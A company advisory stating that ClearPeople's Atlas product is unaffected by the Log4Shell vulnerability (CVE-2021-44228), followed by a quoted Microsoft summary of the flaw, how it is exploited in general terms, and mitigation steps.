Zero Day vulnerability CVE-2021-44228 – Atlas by ClearPeople

We have been reviewing the zero day vulnerability CVE-2021-44228, disclosed on December 9, 2021 and that was actively being targeted and exploited in the wild.

The vulnerability CVE-2021-44228 affects Java environments with the Java module Log4j 2. The Atlas solution provided by ClearPeople does not use any Java infrastructure maintained by our clients nor by ClearPeople and therefor is not affected by this vulnerability.

Microsoft is in charge of maintaining the infrastructure behind Office 365. Although we cannot know whether such infrastructure uses Java at all, we can be confident that Microsoft has taken the necessary measures to protect their infrastructure against this and any other known vulnerability.

Below is a summary of Microsoft knowledge about the CVE-2021-44228 vulnerability. This information, along with other much more detailed, shows the deep understanding Microsoft has about the issue. It may also be useful for you to evaluate whether you have other infrastructure (maintained by another provider) which could be potentially affected.

Microsoft’s information about CVE-2021-44228

Microsoft is investigating attacks taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2 disclosed on December 9, 2021. The vulnerability, tracked as CVE-2021-44228 and referred to as “Log4Shell,” affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1.

Log4j 2 is a Java-based logging library that is widely used in business system development, included in various open-source libraries, and directly embedded in major software applications. The scope of impact has expanded to thousands of products and devices, including Apache products such as Struts 2, Solr, Druid, Flink, and Swift. Because this vulnerability is in a Java library, the cross-platform nature of Java means the vulnerability is exploitable on many platforms, including both Windows and Linux. As many Java-based applications can leverage Log4j 2, organizations should contact application and hardware vendors or ensure their Java applications are running the latest up-to-date version. Developers using Log4j 2 should ensure that they are incorporating the latest version of Log4j into their applications as soon as possible to protect users and organizations.

The vulnerability can allow unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component.

The specially crafted string that enables execution of this vulnerability can be identified through several components. The string contains jdni, which refers to the Java Directory Naming Interface. Following this, the protocol such as ldap, ldaps, rmi, dns, or http precedes the attacker domain.

Once the attacker has full access and control of the application, they can perform a myriad of objectives. Microsoft has observed post exploitation activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating sensitive data from systems.

The execution of this vulnerability takes advantage of the log4j2.formatMsgNoLookups option in the library’s configuration being set to False. To mitigate this threat, upgrade instances of Log4j to the version 2.15.0 and ensure that the log4j2.formatMsgNoLookups option in the library’s configuration is set to True. Log4j version 2.10.0 through 2.14.1 have this option set to False by default – if upgrading is not an option, manually edit the option to True. All systems, including those that are not customer facing, are potentially vulnerable to this exploit, so backend systems and microservices should also be upgraded. For Apache Maven or Gradle projects, update Log4j to 2.15.0 on the dependency tree of the project.

As Microsoft and the industry at large continue to gain a deeper understanding of the impact of this threat, we are publishing technical information that can help defenders detect, investigate, and mitigate attacks, as well as guidance for using Microsoft security solutions to increase resilience against related attacks. We will update this report with information and protection details as they become available.